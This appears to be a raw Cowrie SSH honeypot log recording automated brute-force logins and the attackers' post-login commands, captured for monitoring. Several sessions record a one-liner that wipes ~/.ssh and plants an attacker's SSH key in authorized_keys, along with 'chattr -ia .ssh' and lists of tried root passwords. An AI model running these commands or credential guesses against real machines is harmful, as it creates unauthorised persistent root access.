{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.078474Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:58.353961Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.354652Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":41242,"dst_ip":"1.2.3.4","dst_port":22,"session":"594903f21acc","protocol":"ssh","message":"New connection: 154.209.4.55:41242 (1.2.3.4:22) [session: 594903f21acc]","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.356996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.357678Z","src_ip":"154.209.4.55","session":"594903f21acc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.466213Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.467084Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.567586Z","src_ip":"154.209.4.55","session":"594903f21acc"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":50130,"dst_ip":"1.2.3.4","dst_port":22,"session":"862b508781cf","protocol":"ssh","message":"New connection: 192.210.135.20:50130 (1.2.3.4:22) [session: 862b508781cf]","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.574362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.575259Z","src_ip":"192.210.135.20","session":"862b508781cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:58.684546Z","src_ip":"192.210.135.20","session":"862b508781cf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:59.162415Z","src_ip":"192.210.135.20","session":"862b508781cf"}
{"eventid":"cowrie.login.failed","username":"server","password":"123123","message":"login attempt [server/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:59.459871Z","src_ip":"154.209.4.55","session":"594903f21acc"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.273829Z","src_ip":"192.210.135.20","session":"862b508781cf"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":51182,"dst_ip":"1.2.3.4","dst_port":22,"session":"58ede0681fa6","protocol":"ssh","message":"New connection: 192.210.135.20:51182 (1.2.3.4:22) [session: 58ede0681fa6]","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.382025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.382801Z","src_ip":"192.210.135.20","session":"58ede0681fa6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.491948Z","src_ip":"192.210.135.20","session":"58ede0681fa6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.681240Z","src_ip":"154.209.4.55","session":"594903f21acc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:00.970506Z","src_ip":"192.210.135.20","session":"58ede0681fa6"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:01.081154Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:01.082213Z","src_ip":"192.210.135.20","session":"58ede0681fa6"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":11115,"dst_ip":"1.2.3.4","dst_port":22,"session":"b55554ddf377","protocol":"ssh","message":"New connection: 211.22.25.164:11115 (1.2.3.4:22) [session: b55554ddf377]","sensor":"my-vps","timestamp":"2025-09-09T04:06:29.295644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:29.296634Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:29.535958Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.login.success","username":"root","password":"Wz123456","message":"login attempt [root/Wz123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:30.537598Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:31.040132Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:31.040931Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:31.041798Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59112,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a4e8a1d7aba","protocol":"ssh","message":"New connection: 212.227.235.229:59112 (1.2.3.4:22) [session: 3a4e8a1d7aba]","sensor":"my-vps","timestamp":"2025-09-09T04:06:31.108248Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:31.285095Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:31.863620Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:06:31.864293Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:06:32.108073Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:32.109238Z","src_ip":"211.22.25.164","session":"b55554ddf377"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":33605,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c1fb77b7c8b","protocol":"ssh","message":"New connection: 211.22.25.164:33605 (1.2.3.4:22) [session: 2c1fb77b7c8b]","sensor":"my-vps","timestamp":"2025-09-09T04:06:32.347647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:32.348510Z","src_ip":"211.22.25.164","session":"2c1fb77b7c8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:32.588347Z","src_ip":"211.22.25.164","session":"2c1fb77b7c8b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:06:33.589129Z","src_ip":"211.22.25.164","session":"2c1fb77b7c8b"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":53586,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a36aef7a177","protocol":"ssh","message":"New connection: 152.32.190.168:53586 (1.2.3.4:22) [session: 8a36aef7a177]","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.190099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.191031Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.392937Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":53892,"dst_ip":"1.2.3.4","dst_port":22,"session":"62afd2744927","protocol":"ssh","message":"New connection: 51.81.118.153:53892 (1.2.3.4:22) [session: 62afd2744927]","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.591190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.592008Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.689665Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:06:34.831277Z","src_ip":"211.22.25.164","session":"2c1fb77b7c8b"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":43296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f36b6b9990cc","protocol":"ssh","message":"New connection: 211.22.25.164:43296 (1.2.3.4:22) [session: f36b6b9990cc]","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.070611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.071486Z","src_ip":"211.22.25.164","session":"f36b6b9990cc"}
{"eventid":"cowrie.login.success","username":"root","password":"Zxc!@#123","message":"login attempt [root/Zxc!@#123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.112962Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.login.success","username":"root","password":"nE7jAInvalid","message":"login attempt [root/nE7jAInvalid] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.241173Z","src_ip":"152.32.190.168","session":"8a36aef7a177"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:06:35.364451Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.365112Z","src_ip":"51.81.118.153","session":"62afd2744927"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:06:35.366131Z","src_ip":"51.81.118.153","session":"62afd2744927"}
